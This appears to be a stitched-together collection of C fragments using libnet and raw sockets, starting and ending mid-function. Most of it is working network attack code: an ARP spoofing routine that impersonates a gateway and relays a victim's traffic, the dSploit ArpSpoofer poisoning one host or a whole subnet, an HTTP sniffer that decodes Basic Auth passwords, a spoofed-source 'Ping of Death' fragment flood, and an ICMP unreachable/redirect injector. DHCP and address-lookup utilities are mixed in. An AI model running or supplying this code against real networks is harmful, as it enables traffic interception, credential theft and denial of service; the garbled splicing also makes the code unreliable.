if ((sd2 = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
perror("socket() failed ");
exit(EXIT_FAILURE);
}
// Listen for incoming ethernet frame from socket sd.
// We expect an ARP ethernet frame of the form:
// MAC (6 bytes) + MAC (6 bytes) + ethernet type (2 bytes)
// + ethernet data (ARP header) (28 bytes)
// Keep at it until we get an ARP reply.
arphdr_receive = (arp_hdr *)(ether_frame2 + LIBNET_ETH_H);
/////////////////////// 1. send REQUEST packet ////////////////////////////
// ARP header (request)
// Hardware type (16 bits): 1 for ethernet
// arp_request_hdr.ar_hrd = htons(ARPHRD_ETHER);
arphdr_send.htype = htons(ARPHRD_ETHER);
// Protocol type (16 bits): 2048 for IP
arphdr_send.ptype = htons(ETHERTYPE_IP);
// Hardware address length (8 bits): 6 bytes for MAC address
arphdr_send.hlen = 6;
// Protocol address length (8 bits): 4 bytes for IPv4 address
arphdr_send.plen = 4;
// OpCode: 1 for ARP request
arphdr_send.opcode = htons(ARPOP_REQUEST);
// Sender hardware address (48 bits): MAC address
memcpy(&arphdr_send.sender_mac, mac_addr, 6 * sizeof(uint8_t));
// Sender protocol address (32 bits)
memcpy(&arphdr_send.sender_ip, &ip_addr, 4 * sizeof(uint8_t));
// See getaddrinfo() resolution of src_ip;.
// Target hardware address (48 bits): zero, since we don't know it yet.
memset(&arphdr_send.target_mac, 0, 6 * sizeof(uint8_t));
// Target protocol address (32 bits)
memcpy(&arphdr_send.target_ip, &target_ip_addr, 4 * sizeof(uint8_t));
// Fill out ethernet frame header.
// Ethernet frame length = ethernet header (MAC + MAC + ethernet type) + ethernet data (ARP header)
frame_length = LIBNET_ETH_H + LIBNET_ARP_ETH_IP_H;
// Set destination MAC address: broadcast address
dst_mac = (uint8_t *)malloc(6 * sizeof(uint8_t));
memset(dst_mac, 0xff, 6 * sizeof(uint8_t));
// Destination and Source MAC addresses
memcpy(ether_frame, dst_mac, 6 * sizeof(uint8_t));
memcpy(ether_frame + 6, mac_addr->ether_addr_octet, 6 * sizeof(uint8_t));
// Next is ethernet type code (ETH_P_ARP for ARP).
ether_frame[12] = ETHERTYPE_ARP / 256;
ether_frame[13] = ETHERTYPE_ARP % 256;
// Next is ethernet frame data (ARP header).
// ARP header
memcpy(ether_frame + LIBNET_ETH_H, &arphdr_send, LIBNET_ARP_ETH_IP_H * sizeof(uint8_t));
// Submit request for a raw socket descriptor.
if ((sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
perror("socket() failed ");
exit(EXIT_FAILURE);
}
// struct sockaddr_ll device, which will be used as an argument of sendto().
memset(&device, 0, sizeof(device));
if ((device.sll_ifindex = if_nametoindex("ens33")) == 0) {
perror("if_nametoindex() failed to obtain interface index ");
exit(EXIT_FAILURE);
}
// Fill out sockaddr_ll.
device.sll_family = AF_PACKET;
memcpy(device.sll_addr, mac_addr, 6 * sizeof(uint8_t));
device.sll_halen = 6;
// Send ethernet frame to socket.
if ((bytes = sendto(sd, ether_frame, frame_length, 0, (struct sockaddr *) &device, sizeof(device))) <= 0) {
perror("sendto() failed");
exit(EXIT_FAILURE);
}
///////////////////////////// 2. receive packet ///////////////////////
while (((((ether_frame2[12]) << 8) + ether_frame2[13]) != ETH_P_ARP) || (ntohs(arphdr_receive->opcode) != ARPOP_REPLY)) {
if ((recv(sd2, ether_frame2, IP_MAXPACKET, 0)) < 0) {
if (errno == EINTR) {
memset(ether_frame2, 0, IP_MAXPACKET * sizeof(uint8_t));
continue;
}
else {
perror("recv() failed:");
exit(EXIT_FAILURE);
}
}
}
////////////////// print received packet ///////////////////
// Print out contents of received ethernet frame.
printf("\n [+]PRINT REPLY_PACKET");
printf("\nEthernet frame header:\n");
printf("Destination MAC (this node): ");
int i = 0;
for (i = 0; i < 5; i++) {
printf("%02x:", ether_frame2[i]);
}
printf("%02x\n", ether_frame2[5]);
printf("Source MAC: ");
for (i = 0; i < 5; i++) {
printf("%02x:", ether_frame2[i + 6]);
}
printf("%02x\n", ether_frame2[11]);
// Next is ethernet type code (ETH_P_ARP for ARP).
printf("Ethernet type code (2054 = ARP): %u\n", ((ether_frame2[12]) << 8) + ether_frame2[13]);
printf("Ethernet data (ARP header):\n");
printf("Hardware type (1 = ethernet (10 Mb)): %u\n", ntohs(arphdr_receive->htype));
printf("Protocol type (2048 for IPv4 addresses): %u\n", ntohs(arphdr_receive->ptype));
printf("Hardware (MAC) address length (bytes): %u\n", arphdr_receive->hlen);
printf("Protocol (IPv4) address length (bytes): %u\n", arphdr_receive->plen);
printf("Opcode (2 = ARP reply): %u\n", ntohs(arphdr_receive->opcode));
printf("Sender hardware (MAC) address: ");
for (i = 0; i < 5; i++) {
printf("%02x:", arphdr_receive->sender_mac[i]);
}
printf("%02x\n", arphdr_receive->sender_mac[5]);
printf("Sender protocol (IPv4) address: %u.%u.%u.%u\n",
arphdr_receive->sender_ip[0], arphdr_receive->sender_ip[1], arphdr_receive->sender_ip[2], arphdr_receive->sender_ip[3]);
printf("Target hardware (MAC) address: ");
for (i = 0; i < 5; i++) {
printf("%02x:", arphdr_receive->target_mac[i]);
}
printf("%02x\n", arphdr_receive->target_mac[5]);
printf("Target protocol (IPv4) address: %u.%u.%u.%u\n",
arphdr_receive->target_ip[0], arphdr_receive->target_ip[1], arphdr_receive->target_ip[2], arphdr_receive->target_ip[3]);
printf("\n");
////////////////////// 3.send spoofing packet /////////////////////////////////////
arp_hdr arphdr_spoof;
uint8_t *ether_frame3;
ether_frame3 = (uint8_t *)malloc(IP_MAXPACKET * sizeof(uint8_t));
memset(ether_frame3, 0, IP_MAXPACKET * sizeof(uint8_t));
// ARP header (request)
// target mac = victim
// sender mac = attacker
// target ip = victim
// sender ip = gateway
// dst mac = victim mac
// src mac = attacter mac
// Hardware type (16 bits): 1 for ethernet
// arp_request_hdr.ar_hrd = htons(ARPHRD_ETHER);
arphdr_spoof.htype = htons(ARPHRD_ETHER);
// Protocol type (16 bits): 2048 for IP
arphdr_spoof.ptype = htons(ETHERTYPE_IP);
// Hardware address length (8 bits): 6 bytes for MAC address
arphdr_spoof.hlen = 6;
// Protocol address length (8 bits): 4 bytes for IPv4 address
arphdr_spoof.plen = 4;
// OpCode: 1 for ARP request
arphdr_spoof.opcode = htons(ARPOP_REPLY);
// Sender hardware address (48 bits): MAC address
memcpy(&arphdr_spoof.sender_mac, &arphdr_send.sender_mac, 6 * sizeof(uint8_t));
// Sender protocol address (32 bits) : gateway address
memcpy(arphdr_spoof.sender_ip, &gw_ip_addr, 4 * sizeof(uint8_t));
// See getaddrinfo() resolution of src_ip;.
// Target hardware address (48 bits): victim address
memcpy(&arphdr_spoof.target_mac, arphdr_receive->sender_mac , 6 * sizeof(uint8_t) );
// Target protocol address (32 bits)
memcpy(&arphdr_spoof.target_ip, &arphdr_send.target_ip, 4 * sizeof(uint8_t));
// Fill out ethernet frame header.
// Ethernet frame length = ethernet header (MAC + MAC + ethernet type) + ethernet data (ARP header)
frame_length = LIBNET_ETH_H + LIBNET_ARP_ETH_IP_H;
// Set destination MAC address: broadcast address
uint8_t *dst_mac_spf;
dst_mac_spf = (uint8_t *)malloc(6 * sizeof(uint8_t));
memcpy(dst_mac_spf, arphdr_receive->sender_mac, 6 * sizeof(uint8_t));
// Destination and Source MAC addresses
memcpy(ether_frame3, arphdr_receive->sender_mac, 6 * sizeof(uint8_t));
memcpy(ether_frame3 + 6, arphdr_receive->target_mac, 6 * sizeof(uint8_t));
// Next is ethernet type code (ETH_P_ARP for ARP).
// http://www.iana.org/assignments/ethernet-numbers
ether_frame3[12] = ETHERTYPE_ARP / 256;
ether_frame3[13] = ETHERTYPE_ARP % 256;
// Next is ethernet frame data (ARP header).
// ARP header
memcpy(ether_frame3 + LIBNET_ETH_H, &arphdr_spoof, LIBNET_ARP_ETH_IP_H * sizeof(uint8_t));
// Submit request for a raw socket descriptor.
if ((sd3 = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
perror("socket() failed ");
exit(EXIT_FAILURE);
}
// Find interface index from interface name and store index in
// struct sockaddr_ll device, which will be used as an argument of sendto().
memset(&device, 0, sizeof(device));
if ((device.sll_ifindex = if_nametoindex("ens33")) == 0) {
perror("if_nametoindex() failed to obtain interface index ");
exit(EXIT_FAILURE);
}
// Fill out sockaddr_ll.
device.sll_family = AF_PACKET;
memcpy(device.sll_addr, mac_addr, 6 * sizeof(uint8_t));
device.sll_halen = 6;
printf("\n [+]SEND SPOOFING PACKET \n");
char *mac_buff;
mac_buff = (char *)malloc(17 * sizeof(char));
//Parameter param;
spoof_P.sd = sd3;
spoof_P.ether_frame = ether_frame3;
spoof_P.frame_length = frame_length;
spoof_P.device = device;
arp_hdr pk;
pk.htype = htons(ARPHRD_ETHER);
pk.ptype = htons(ETHERTYPE_IP);
pk.hlen = 6; //6 bytes for MAC address
pk.plen = 4; //4 bytes for IPv4 address
pk.opcode=htons(ARPOP_REQUEST);
memcpy(pk.sender_mac, arphdr_spoof.target_mac, 6 * sizeof(uint8_t));
memcpy(pk.sender_ip, arphdr_spoof.target_ip, 4 * sizeof(uint8_t));
memcpy(pk.target_mac, arphdr_spoof.sender_mac, 6 * sizeof(uint8_t));
memcpy(pk.target_ip, arphdr_spoof.sender_ip, 4 * sizeof(uint8_t));
thr_id = pthread_create(&p_thread[0], NULL, send_packet, (void *)&spoof_P); //send infected packet
thr_id2 = pthread_create(&p_thread[1], NULL, relay_packet, (void *)&pk); // relay infected packet
pthread_join(p_thread[0],NULL);
pthread_join(p_thread[1],NULL);
free(mac_buff);
free(dst_mac);
free(ether_frame);
free(ether_frame2);
close(sd);
close(sd2);
close(sd3);
return (EXIT_SUCCESS);
}
int
process_http_request(struct tuple4 *addr, u_char *data, int len)
{
struct buf *msg, buf;
char *p, *req, *uri, *user, *vhost, *referer, *agent;
int i;
buf_init(&buf, data, len);
while ((i = buf_index(&buf, "\r\n\r\n", 4)) >= 0) {
msg = buf_tok(&buf, NULL, i);
msg->base[msg->end] = '\0';
buf_skip(&buf, 4);
if (!regex_match(buf_ptr(msg)))
continue;
if ((req = strtok(buf_ptr(msg), "\r\n")) == NULL)
continue;
if (strncmp(req, "GET ", 4) != 0 &&
strncmp(req, "POST ", 5) != 0 &&
strncmp(req, "CONNECT ", 8) != 0)
continue;
if ((uri = strchr(req, ' ')) == NULL)
continue;
*uri++ = '\0';
user = vhost = referer = agent = NULL;
while ((p = strtok(NULL, "\r\n")) != NULL) {
if (strncasecmp(p, "Authorization: Basic ", 21) == 0) {
p += 21;
i = base64_pton(p, p, strlen(p));
p[i] = '\0';
user = p;
if ((p = strchr(p, ':')) != NULL)
*p = '\0';
}
else if (strncasecmp(p, "Host: ", 6) == 0) {
vhost = p + 6;
}
else if (strncasecmp(p, "Referer: ", 9) == 0) {
referer = p + 9;
}
else if (strncasecmp(p, "User-Agent: ", 12) == 0) {
agent = p + 12;
}
else if (strncasecmp(p, "Content-length: ", 16) == 0) {
i = atoi(p + 16);
buf_tok(NULL, NULL, i);
}
}
if (user == NULL)
user = "******";
if (vhost == NULL)
vhost = "none";// libnet_host_lookup(addr->daddr, Opt_dns);
if (referer == NULL)
referer = "-";
if (agent == NULL)
agent = "-";
printf("%s - %s [%s] \"%s http://%s%s\" - - \"%s\" \"%s\"\n",
//"0.0.0.0",
libnet_addr2name4(addr->saddr, Opt_dns),
user, timestamp(), req, vhost, uri, referer, agent);
}
fflush(stdout);
return (len - buf_len(&buf));
}
int
main(int argc, char *argv[])
{
char *intf;
u_long src_ip, options_len, orig_len;
int i;
libnet_t *l;
libnet_ptag_t t;
libnet_ptag_t ip;
libnet_ptag_t udp;
libnet_ptag_t dhcp;
struct libnet_ether_addr *ethaddr;
struct libnet_stats ls;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char options_req[] = { LIBNET_DHCP_SUBNETMASK , LIBNET_DHCP_BROADCASTADDR , LIBNET_DHCP_TIMEOFFSET , LIBNET_DHCP_ROUTER , LIBNET_DHCP_DOMAINNAME , LIBNET_DHCP_DNS , LIBNET_DHCP_HOSTNAME };
u_char *options;
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
u_char *tmp;
// have to specify interface
if (argc != 2)
usage(argv[0]);
intf = argv[1];
l = libnet_init(
LIBNET_LINK, // injection type
intf, // network interface
errbuf); // errbuf
if (!l)
{
fprintf(stderr, "libnet_init: %s", errbuf);
exit(EXIT_FAILURE);
}
else {
src_ip = libnet_get_ipaddr4(l);;
if ((ethaddr = libnet_get_hwaddr(l)) == NULL)
{
fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
printf("ip addr : %s\n", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE));
printf("eth addr : ");
for (i = 0; i < 6; i++) {
printf("%x", ethaddr->ether_addr_octet[i]);
if (i != 5) {
printf(":");
}
}
printf("\n");
// build options packet
i = 0;
options_len = 3; // update total payload size
// we are a discover packet
options = malloc(3);
options[i++] = LIBNET_DHCP_MESSAGETYPE; // type
options[i++] = 1; // len
options[i++] = LIBNET_DHCP_MSGDISCOVER; // data
orig_len = options_len;
options_len += sizeof(options_req) + 2; // update total payload size
// workaround for realloc on old machines
// options = realloc(options, options_len); // resize options buffer
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
// we are going to request some parameters
options[i++] = LIBNET_DHCP_PARAMREQUEST; // type
options[i++] = sizeof(options_req); // len
memcpy(options + i, options_req, sizeof(options_req)); // data
i += sizeof(options_req);
// if we have an ip already, let's request it.
if (src_ip)
{
orig_len = options_len;
options_len += 2 + sizeof(src_ip);
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
options[i++] = LIBNET_DHCP_DISCOVERADDR; // type
options[i++] = sizeof(src_ip); // len
memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data
i += sizeof(src_ip);
}
// end our options packet
options[i] = LIBNET_DHCP_END;
// make sure we are at least the minimum length, if not fill
// this could go in libnet, but we will leave it in the app for now
if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN)
{
orig_len = options_len;
options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H;
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
memset(options + i, 0, options_len - i);
}
// the goodies are here
dhcp = libnet_build_dhcpv4(
LIBNET_DHCP_REQUEST, // opcode
1, // hardware type
6, // hardware address length
0, // hop count
0xdeadbeef, // transaction id
0, // seconds since bootstrap
0x8000, // flags
0, // client ip
0, // your ip
0, // server ip
0, // gateway ip
ethaddr->ether_addr_octet, // client hardware addr
NULL, // server host name
NULL, // boot file
options, // dhcp options stuck in payload since it is dynamic
options_len, // length of options
l, // libnet handle
0); // libnet id
// wrap it
udp = libnet_build_udp(
68, // source port
67, // destination port
LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // packet size
0, // checksum
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// hook me up with some ipv4
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H
+ options_len, // length
0x10, // TOS
0, // IP ID
0, // IP Frag
16, // TTL
IPPROTO_UDP, // protocol
0, // checksum
src_ip, // src ip
inet_addr("255.255.255.255"), // destination ip
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// we can just autobuild since we arent doing anything tricky
t = libnet_autobuild_ethernet(
enet_dst, // ethernet destination
ETHERTYPE_IP, // protocol type
l); // libnet handle
// write to the wire
if (libnet_write(l) == -1)
{
fprintf(stderr, " %s: libnet_write: %s\n", argv[0],
strerror(errno));
exit(EXIT_FAILURE);
}
// fill and print stats
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
// free mem
free(options);
exit(0);
}
exit(0);
}
int
main(int argc, char *argv[])
{
int c;
u_long i;
libnet_t *l;
char *device = NULL;
struct libnet_ether_addr *e;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 address getter\n");
while ((c = getopt(argc, argv, "i:")) != EOF)
{
switch (c)
{
case 'i':
device = optarg;
break;
default:
exit(EXIT_FAILURE);
}
}
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
printf("Interface %s\n", libnet_getdevice(l));
e = libnet_get_hwaddr(l);
if (e == NULL)
{
fprintf(stderr, "Can't get hardware address: %s\n", libnet_geterror(l));
}
else
{
printf("MAC address: ");
for (c = 0; c < 6; c++)
{
printf("%x", e->ether_addr_octet[c]);
if (c != 5)
{
printf(":");
}
}
printf("\n");
}
i = libnet_get_ipaddr4(l);
if (i == -1)
{
fprintf(stderr, "Can't get ip address: %s\n", libnet_geterror(l));
}
else
{
printf("IP address: ");
printf("%s\n", libnet_addr2name4(i, LIBNET_DONT_RESOLVE));
}
exit(EXIT_SUCCESS);
}
/* Send an ICMP packet, such as host unreachable, to the source and destination addresses */
void
rst_icmp_send(pkt_t *rst)
{
struct ip *ih = NULL;
struct tcphdr *th = NULL;
int pair = 0;
char *state = NULL;
size_t icmp_len = 0;
ih = (struct ip *)(rst->pkt + sizeof(struct ether_header));
th = (struct tcphdr *)(rst->pkt + sizeof(struct ether_header) + sizeof(struct ip));
/* The interface described in "Building Open Source Network Security Tools"
* appears to be deprecated. The new interface tunnels an IPv4 packet
* within the ICMP unreachable using the libnet context.
*/
switch (rst->icmp.type) {
/* RFC 792
*
* Type 3
*
* Codes 0, 1, 4, and 5 may be received from a gateway. Codes 2 and
* 3 may be received from a host.
*
* 0 = net unreachable;
* 1 = host unreachable;
* 2 = protocol unreachable;
* 3 = port unreachable;
* 4 = fragmentation needed and DF set;
* 5 = source route failed.
*
*/
case ICMP_UNREACH:
icmp_len = LIBNET_ICMPV4_UNREACH_H + LIBNET_IPV4_H + ICMP_PKTLEN;
LIBNET_ERR(libnet_build_icmpv4_unreach(
rst->icmp.type, /* ICMP type, e.g. 3 (Unreachable) */
rst->icmp.code, /* ICMP code, e.g., 1 (Bad Host) */
0, /* auto checksum */
(u_char *)ih, /* payload */
LIBNET_IPV4_H + ICMP_PKTLEN, /* payload size */
rst->l, /* libnet context */
0 /* ptag */
));
break;
/*
* Type 5
*
* Codes 0, 1, 2, and 3 may be received from a gateway.
*
* 0 = Redirect datagrams for the Network.
* 1 = Redirect datagrams for the Host.
* 2 = Redirect datagrams for the Type of Service and Network.
* 3 = Redirect datagrams for the Type of Service and Host.
*
*/
case ICMP_REDIRECT:
icmp_len = LIBNET_ICMPV4_REDIRECT_H;
LIBNET_ERR(libnet_build_icmpv4_unreach(
rst->icmp.type,
rst->icmp.code,
0,
(u_char *)ih,
LIBNET_IPV4_H + ICMP_PKTLEN,
rst->l,
0));
break;
/*
* Type 11
*
* Code 0 may be received from a gateway. Code 1 may be received
* from a host.
*
* 0 = time to live exceeded in transit
* 1 = fragment reassembly time exceeded
*
*/
case ICMP_TIMXCEED:
icmp_len = LIBNET_ICMPV4_TIMXCEED_H + LIBNET_IPV4_H + ICMP_PKTLEN;
LIBNET_ERR(libnet_build_icmpv4_timeexceed(
rst->icmp.type,
rst->icmp.code,
0,
(u_char *)ih,
LIBNET_IPV4_H + ICMP_PKTLEN,
rst->l,
0));
break;
case ICMP_PARAMPROB:
case ICMP_SOURCEQUENCH:
errx(EXIT_FAILURE, "Not supported by libnet.");
break;
default:
errx(EXIT_FAILURE, "ICMP type %d is not supported yet\n",
rst->icmp.type);
}
LIBNET_ERR(libnet_build_ipv4(
LIBNET_IPV4_H + icmp_len, /* payload size */
IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* TOS */
ntohs(ih->ip_id)+1, /* IP ID */
0, /* Frag */
64, /* TTL */
IPPROTO_ICMP, /* Protocol */
0, /* auto checksum */
ih->ip_dst.s_addr, /* source */
ih->ip_src.s_addr, /* destination */
NULL, /* payload */
0, /* payload size */
rst->l, /* libnet context */
0 /* libnet ptag */
));
state = ((libnet_write(rst->l) == -1) ? "x" : "I");
(void)fprintf(stdout, "[%s] SRC = %15s:%-6u DST = %15s:%-6u len = %d/%d\n", state,
libnet_addr2name4(PAIR(pair, ih->ip_src.s_addr, ih->ip_dst.s_addr), LIBNET_DONT_RESOLVE),
PAIR(pair, ntohs(th->th_sport), ntohs(th->th_dport)),
libnet_addr2name4(PAIR(pair, ih->ip_dst.s_addr, ih->ip_src.s_addr), LIBNET_DONT_RESOLVE),
PAIR(pair, ntohs(th->th_dport), ntohs(th->th_sport)), LIBNET_IPV4_H + (u_int32_t)icmp_len, ntohs(ih->ip_len));
(void)fflush(stdout);
usleep(rst->sleep_for);
}
int main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
char pcap_ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
int c,
netmask = 0,
ifaddr = 0,
nhosts = 0,
i = 0;
network_entry_t *entry;
iface = NULL;
gateway_ip = target_ip = 0;
printf( "dSploit ArpSpoofer.\n\n" );
while( (c = getopt(argc, argv, "i:t:h?V")) != -1)
{
switch (c)
{
case 'i':
iface = optarg;
break;
case 't':
if ((target_ip = libnet_name2addr4(lnet, optarg, LIBNET_RESOLVE)) == -1)
exit(1);
break;
default:
return 1;
}
}
argc -= optind;
argv += optind;
if (argc != 1)
return 1;
if( ( gateway_ip = libnet_name2addr4( lnet, argv[0], LIBNET_RESOLVE ) ) == -1 )
{
printf( "[ERROR] Unable to resolve gateway ip.\n" );
return 1;
}
if( iface == NULL && (iface = pcap_lookupdev(pcap_ebuf)) == NULL )
{
printf( "[ERROR] Unable to lookup network interface ( %s ).\n", pcap_ebuf );
return 1;
}
if( ( lnet = libnet_init(LIBNET_LINK, iface, libnet_ebuf) ) == NULL )
{
printf( "[ERROR] Unable to initialize libnet ( %s ).\n", libnet_ebuf );
return 1;
}
signal( SIGHUP, cleanup );
signal( SIGINT, cleanup );
signal( SIGTERM, cleanup );
our_mac = ( struct ether_addr * )libnet_get_hwaddr( lnet );
if( our_mac == NULL )
{
printf( "[ERROR] Unable to retrieve local hardware address libnet ( %s ).\n", libnet_geterror( lnet ) );
return 1;
}
if( net_get_details( iface, &netmask, &ifaddr, &nhosts ) != 0 )
exit( 1 );
printf( "netmask = %s\n", inet_ntoa( *( struct in_addr *)&netmask ) );
printf( "ifaddr = %s\n", inet_ntoa( *( struct in_addr *)&ifaddr ) );
printf( "gateway = %s\n", inet_ntoa( *( struct in_addr *)&gateway_ip ) );
printf( "hosts = %d\n", nhosts );
// force the arp cache to be populated
net_wake( iface, nhosts, ifaddr, netmask, gateway_ip );
// if the target is the gateway itself, we switch to subnet mode,
// otherwise if the target was set, we are in single ip spoofing mode.
if( target_ip != 0 && target_ip != gateway_ip )
{
if( target_ip != 0 && arp_lookup( target_ip, &target_mac, iface ) != 0 )
{
printf( "[ERROR] Couldn't find a cached MAC address for %s, try to wait a little bit and then try again or restart the network discovery.\n", libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE) );
return 1;
}
printf( "\nSingle target mode.\n" );
while( killed == 0 )
{
arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&target_mac, target_ip );
sleep(1);
}
}
// whole network spoofing
else
{
printf( "\nSubnet mode.\n" );
netmap = net_get_mapping( iface, nhosts, ifaddr, netmask, gateway_ip, &i );
if( i == 0 )
{
printf( "[ERROR] No alive endpoints found.\n" );
return 1;
}
while( killed == 0 )
{
for( i = 1; i <= nhosts && killed == 0; i++ )
{
target_ip = ( ifaddr & netmask ) | htonl(i);
entry = hashmapGet( netmap, (void *)target_ip );
if( entry && killed == 0 )
{
arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&entry->mac, target_ip );
}
}
sleep(1);
}
}
return 0;
}
int
main(int argc, char **argv)
{
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t icmp;
struct libnet_stats ls;
u_long fakesrc, target;
u_char *data;
int c, i, flags, offset, len;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 Ping of Death[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(EXIT_FAILURE);
}
/* get random src addr. */
libnet_seed_prand(l);
fakesrc = libnet_get_prand(LIBNET_PRu32);
data = malloc(FRAG_LEN);
for (i = 0 ; i < FRAG_LEN ; i++)
{
/* fill it with something */
data[i] = 0x3a;
}
ip = LIBNET_PTAG_INITIALIZER;
icmp = LIBNET_PTAG_INITIALIZER;
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
{
offset = i;
flags = 0;
if (offset < 65120)
{
flags = IP_MF;
len = FRAG_LEN;
}
else
{
/* for a total reconstructed length of 65538 bytes */
len = 410;
}
icmp = libnet_build_icmpv4_echo(
ICMP_ECHO, /* type */
0, /* code */
0, /* checksum */
666, /* id */
666, /* sequence */
data, /* payload */
len, /* payload size */
l, /* libnet handle */
icmp); /* libnet ptag */
if (icmp == -1)
{
fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
goto bad;
}
/* no reason to do this */
libnet_toggle_checksum(l, icmp, 0);
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
0, /* TOS */
666, /* IP ID */
flags | (offset >> 3), /* IP Frag */
64, /* TTL */
IPPROTO_ICMP, /* protocol */
0, /* checksum */
fakesrc, /* source IP */
target, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet ptag */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
}
/* tcpdump-style jonks. */
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
}
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %lld\n"
"Packet errors: %lld\n"
"Bytes written: %lld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
free(data);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
free(data);
return (EXIT_FAILURE);
}
static void dump_dhcp_packet(struct libnet_dhcpv4_hdr *dhcp_hdr)
{
int i, entry;
char opt_buf[1024];
printf(" - beginning of dump -\n");
printf("DHCP operation : ");
switch (dhcp_hdr->dhcp_opcode) {
case LIBNET_DHCP_REQUEST:
printf("request\n");
break;
case LIBNET_DHCP_REPLY:
printf("reply\n");
break;
default:
printf("unknown code 0x%x\n", dhcp_hdr->dhcp_opcode);
}
printf("Hardware type : ");
switch (dhcp_hdr->dhcp_htype) {
case 1:
printf("ethernet\n");
break;
default:
printf("unknown code 0x%x\n", dhcp_hdr->dhcp_htype);
}
printf("Hardware address length : %d bytes\n", dhcp_hdr->dhcp_hlen);
printf("Hop count : %d\n", dhcp_hdr->dhcp_hopcount);
printf("Transaction ID : 0x%x\n", ntohl(dhcp_hdr->dhcp_xid));
printf("Number of seconds : %d\n", ntohs(dhcp_hdr->dhcp_secs));
printf("Flags : 0x%x\n", ntohs(dhcp_hdr->dhcp_flags));
printf("Client IP : %s\n",
libnet_addr2name4(dhcp_hdr->dhcp_cip, LIBNET_DONT_RESOLVE));
printf("Your IP : %s\n",
libnet_addr2name4(dhcp_hdr->dhcp_yip, LIBNET_DONT_RESOLVE));
printf("Server IP : %s\n",
libnet_addr2name4(dhcp_hdr->dhcp_sip, LIBNET_DONT_RESOLVE));
printf("Gateway IP : %s\n",
libnet_addr2name4(dhcp_hdr->dhcp_gip, LIBNET_DONT_RESOLVE));
printf("Client hw addr : ");
for (i = 0; i < dhcp_hdr->dhcp_hlen; i++) {
printf("%2.2x", dhcp_hdr->dhcp_chaddr[i]);
if (dhcp_hdr->dhcp_hlen != (i + 1))
printf(":");
}
printf("\n");
printf("Server hostname : %s\n", dhcp_hdr->dhcp_sname);
printf("Boot filename : %s\n", dhcp_hdr->dhcp_file);
printf("Options\n");
printf(" Magic header : 0x%X (%s)\n",
ntohl(dhcp_hdr->dhcp_magic),
(ntohl(dhcp_hdr->dhcp_magic) == DHCP_MAGIC) ? "OK" : "Corrupt");
options = (uint8_t *) ((intptr_t)(&(dhcp_hdr->dhcp_magic)) + 4);
while ((*options != LIBNET_DHCP_END)) {
/* find option entry in table */
for (entry=0;
(dot[entry].id != *options) && (dot[entry].id != 0xff);
entry++) {
}
if (dot[entry].id == 0xff) {
printf("parsed to end of tag list\n");
break;
}
/* parse option value and print out accordingly */
switch (dot[entry].type) {
case 1:
memset(opt_buf, 0, sizeof(opt_buf));
strncpy(opt_buf, options + 2, *(options + 1));
printf(" %16.16s : %s\n", dot[entry].label,
opt_buf);
break;
case 2:
for (i = 0; i < (*(options + 1)); i += 4) {
